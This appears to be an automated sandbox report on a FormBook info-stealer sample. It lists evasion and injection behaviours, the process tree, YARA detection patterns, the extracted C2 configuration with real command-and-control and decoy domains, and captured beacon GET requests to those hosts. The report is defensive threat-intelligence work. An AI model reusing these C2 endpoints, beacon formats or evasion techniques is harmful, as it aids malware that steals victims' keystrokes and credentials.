Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
shedfam.exe

Overview

General Information

Sample Name:shedfam.exe
Analysis ID:756041
MD5:c0a85d86855b257b25572aa7d9d90381
SHA1:ea5ce824d225c0df297586a2c6621aea5ab8584b
SHA256:c9cf9f0fa6980019aa3a93b9b25ca2cf14cfad4b4afef12d43a20ece34d2093b
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
OS version to string mapping found (often used in BOTs)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Found evasive API chain (may stop execution after accessing registry keys)
Contains functionality to simulate mouse events
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • shedfam.exe (PID: 2620 cmdline: C:\Users\user\Desktop\shedfam.exe MD5: C0A85D86855B257B25572AA7D9D90381)
    • kmhbvf.exe (PID: 4820 cmdline: C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
      • kmhbvf.exe (PID: 5280 cmdline: C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • NETSTAT.EXE (PID: 2304 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 5488 cmdline: /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.justbeand.com/sk19/"], "decoy": ["21diasdegratitud.com", "kx1993.com", "chasergt.com", "837news.com", "naturagent.co.uk", "gatorinsurtech.com", "iyaboolashilesblog.africa", "jamtanganmurah.online", "gguminsa.com", "lilliesdrop.com", "lenvera.com", "link48.co.uk", "azinos777.fun", "lgcdct.cfd", "bg-gobtc.com", "livecarrer.uk", "cbq4u.com", "imalreadygone.com", "wabeng.africa", "jxmheiyouyuetot.tokyo", "atrikvde.xyz", "ceopxb.com", "autovincert.com", "18traversplace.com", "internetmedianews.com", "entersight.net", "guzmanshandymanservicesllc.com", "gqqwdz.com", "emeraldpathjewelery.com", "flowmoneycode.online", "gaziantepmedicalpointanket.com", "111lll.xyz", "irkwood138.site", "abovegross.com", "shopabeee.co.uk", "greenvalleyfoodusa.com", "dd-canada.com", "libertysminings.com", "baronsaccommodation.co.uk", "kareto.buzz", "freeexercisecoalition.com", "73129.vip", "avanteventexperiences.com", "comercialdiabens.fun", "nondescript.uk", "facal.dev", "detox-71934.com", "kovar.club", "jetsparking.com", "infocuspublicidad.com", "xxhcom.com", "indianvoltage.com", "becrownedllc.com", "3744palosverdes.com", "gospelnative.africa", "linkmastermind.com", "cotgfp.com", "lousweigman.com", "cantoaffine.online", "debbiepatrickdesigns.com", "766626.com", "webcubemedia.africa", "autonomaat.com", "hannahmarsh.co.uk"]}
SourceRuleDescriptionAuthorStrings
0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 34 entries
      SourceRuleDescriptionAuthorStrings
      2.0.kmhbvf.exe.400000.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.kmhbvf.exe.400000.5.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.0.kmhbvf.exe.400000.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.kmhbvf.exe.400000.5.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        2.0.kmhbvf.exe.400000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 19 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Yara matchFile source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeJoe Sandbox ML: detected
          Source: 2.0.kmhbvf.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.kmhbvf.exe.3b00000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.kmhbvf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.justbeand.com/sk19/"], "decoy": ["21diasdegratitud.com", "kx1993.com", "chasergt.com", "837news.com", "naturagent.co.uk", "gatorinsurtech.com", "iyaboolashilesblog.africa", "jamtanganmurah.online", "gguminsa.com", "lilliesdrop.com", "lenvera.com", "link48.co.uk", "azinos777.fun", "lgcdct.cfd", "bg-gobtc.com", "livecarrer.uk", "cbq4u.com", "imalreadygone.com", "wabeng.africa", "jxmheiyouyuetot.tokyo", "atrikvde.xyz", "ceopxb.com", "autovincert.com", "18traversplace.com", "internetmedianews.com", "entersight.net", "guzmanshandymanservicesllc.com", "gqqwdz.com", "emeraldpathjewelery.com", "flowmoneycode.online", "gaziantepmedicalpointanket.com", "111lll.xyz", "irkwood138.site", "abovegross.com", "shopabeee.co.uk", "greenvalleyfoodusa.com", "dd-canada.com", "libertysminings.com", "baronsaccommodation.co.uk", "kareto.buzz", "freeexercisecoalition.com", "73129.vip", "avanteventexperiences.com", "comercialdiabens.fun", "nondescript.uk", "facal.dev", "detox-71934.com", "kovar.club", "jetsparking.com", "infocuspublicidad.com", "xxhcom.com", "indianvoltage.com", "becrownedllc.com", "3744palosverdes.com", "gospelnative.africa", "linkmastermind.com", "cotgfp.com", "lousweigman.com", "cantoaffine.online", "debbiepatrickdesigns.com", "766626.com", "webcubemedia.africa", "autonomaat.com", "hannahmarsh.co.uk"]}
          Source: shedfam.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F34005
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00F3C2FF
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose,1_2_00F3494A
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00F3CD9F
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3CD14 FindFirstFileW,FindClose,1_2_00F3CD14
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F3F5D8
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F3F735
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00F3FA36
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F33CE2
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 4x nop then pop esi2_2_004172FF
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 4x nop then pop esi2_2_004172B6

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 18.167.242.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.100.63.146 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.111lll.xyz
          Source: C:\Windows\explorer.exeDomain query: www.73129.vip
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\explorer.exeDNS query: www.111lll.xyz
          Source: Malware configuration extractorURLs: www.justbeand.com/sk19/
          Source: global trafficHTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1Host: www.111lll.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1Host: www.73129.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: YISUCLOUDLTD-AS-APYISUCLOUDLTDHK YISUCLOUDLTD-AS-APYISUCLOUDLTDHK
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
          Source: NETSTAT.EXE, 0000000D.00000002.518369394.0000000003D9F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gcsahrz23.xyz/
          Source: shedfam.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: shedfam.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
          Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.252060134.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000000.294072289.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.305847313.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.257903286.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333339547.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.280708898.000000000F276000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: kmhbvf.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/06
          Source: unknownDNS traffic detected: queries for: www.111lll.xyz
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_00F429BA
          Source: global trafficHTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1Host: www.111lll.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1Host: www.73129.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
